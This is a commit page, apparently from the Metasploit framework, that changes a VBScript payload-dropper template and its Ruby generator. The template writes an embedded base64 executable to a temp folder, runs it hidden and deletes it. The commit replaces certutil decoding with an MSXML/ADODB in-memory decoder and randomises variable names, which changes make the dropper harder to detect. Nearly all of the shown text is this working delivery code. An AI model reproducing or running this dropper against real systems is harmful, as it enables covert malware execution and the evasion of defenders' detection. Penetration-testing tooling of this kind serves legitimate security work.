Skip to content

Commit 629bc00

Browse files
f7b053223a9ef7b053223a9e
committed
Use MSXML decoder instead
1 parent 19bd7b9 commit 629bc00

File tree

2 files changed

+23
-14
lines changed

2 files changed

+23
-14
lines changed

data/templates/scripts/to_exe.vbs.template

Lines changed: 17 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,27 +1,34 @@
1+
Function %{var_decodefunc}(%{var_decodebase64})
2+
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
3+
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
4+
%{var_decodebase64} & "</B64DECODE>"
5+
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
6+
%{var_xmldoc}.LoadXML(%{var_xml})
7+
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
8+
set %{var_xmldoc} = nothing
9+
End Function
10+
111
Function %{var_func}()
212
%{var_shellcode} = "%{base64_shellcode}"
3-
413
Dim %{var_obj}
514
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
6-
Dim %{var_stream}
715
Dim %{var_tempdir}
8-
Dim %{var_tempbase64}
916
Dim %{var_basedir}
1017
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
1118
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
1219
%{var_obj}.CreateFolder(%{var_basedir})
13-
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
1420
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
15-
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
16-
%{var_stream}.Write %{var_shellcode}
17-
%{var_stream}.Close
1821
Dim %{var_shell}
1922
Set %{var_shell} = CreateObject("Wscript.Shell")
20-
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
23+
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
24+
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
25+
%{var_adodbstream}.Type = 1
26+
%{var_adodbstream}.Open
27+
%{var_adodbstream}.Write %{var_decoded}
28+
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
2129
%{var_shell}.run %{var_tempexe}, 0, true
2230
%{var_obj}.DeleteFile(%{var_tempexe})
23-
%{var_obj}.DeleteFile(%{var_tempbase64})
2431
%{var_obj}.DeleteFolder(%{var_basedir})
2532
End Function
2633

27-
%{init}
34+
%{init}

lib/msf/util/exe.rb

Lines changed: 6 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1247,16 +1247,18 @@ def self.to_exe_vbs(exes = '', opts = {})
12471247
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
12481248
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
12491249
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
1250-
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
12511250
hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
12521251
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
12531252
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
12541253
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
1255-
hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
12561254
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
1257-
12581255
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
1259-
1256+
hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
1257+
hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
1258+
hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
1259+
hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
1260+
hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
1261+
hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
12601262
hash_sub[:init] = ""
12611263

12621264
if persist

0 commit comments

Comments
 (0)